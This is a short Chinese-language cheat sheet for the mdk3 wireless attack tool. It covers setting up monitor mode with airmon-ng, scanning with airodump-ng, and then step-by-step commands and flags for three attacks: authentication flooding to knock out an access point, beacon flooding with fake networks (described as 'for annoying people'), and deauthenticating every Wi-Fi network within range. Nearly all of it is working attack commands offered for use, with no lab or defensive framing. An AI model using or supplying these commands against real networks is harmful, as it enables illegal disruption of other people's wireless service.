切换到root账户
sudo -s
安装mdk3
sudo apt install mdk3
查看网卡设备
airmon-ng
激活网卡监听模式
airmon-ng start wlan1 (wlan后的数字以上一个为准)
扫描附近无线网络
airodump-ng wlan1mon
攻击篇
mdk3 使用帮助
mdk3 wlan1mon0 a/b/p
自定义文件命令格式(See example file at /usr/share/doc/mdk3/fakeap-example.txt)
Authentication DoS
洪水攻击 干掉AP
使用命令:
mdk3 wlan1mon0 a
-a 测试指定BSSID
-m 使用有效数据库中的客户端mac地地址
-c 对应 -a ,不检查是否测试成功
-i 对指定BSSID进行智能攻击
-s 发包速率,默认50
Beacon Flood Mode
制造僵尸Wi-Fi 恶心人专用
使用命令:
mdk3 wlan1mon0 b
实例: mdk3 wlan1mon b -f /home/pi/wifi.txt
-n 自定义ESSID
-f 读取ESSID列表文件
-v 自定义ESSID和BSSID对应列表文件
-d 自定义为Ad-Hoc模式
-w 自定义为wep模式
-g 54Mbit模式
-t WPA TKIP encryption
-a WPA AES encryption
-m 读取数据库的mac地址
-c 自定义信道
-s 发包速率
Deauthentication/Disassociation Amok:
强制解除Wi-Fi连接 范围是无线网卡可扫描范围内的所有wifi信号
使用命令: (黑名单文件暂时没有搞明白)
mdk3 wlan1mon0 d
-w 白名单mac地址列表文件
-b 黑名单mac地址列表文件
-s 发包速率,这个模式下默认无限制
-c 信道,可以多填,如 2,4,5,1
网址 :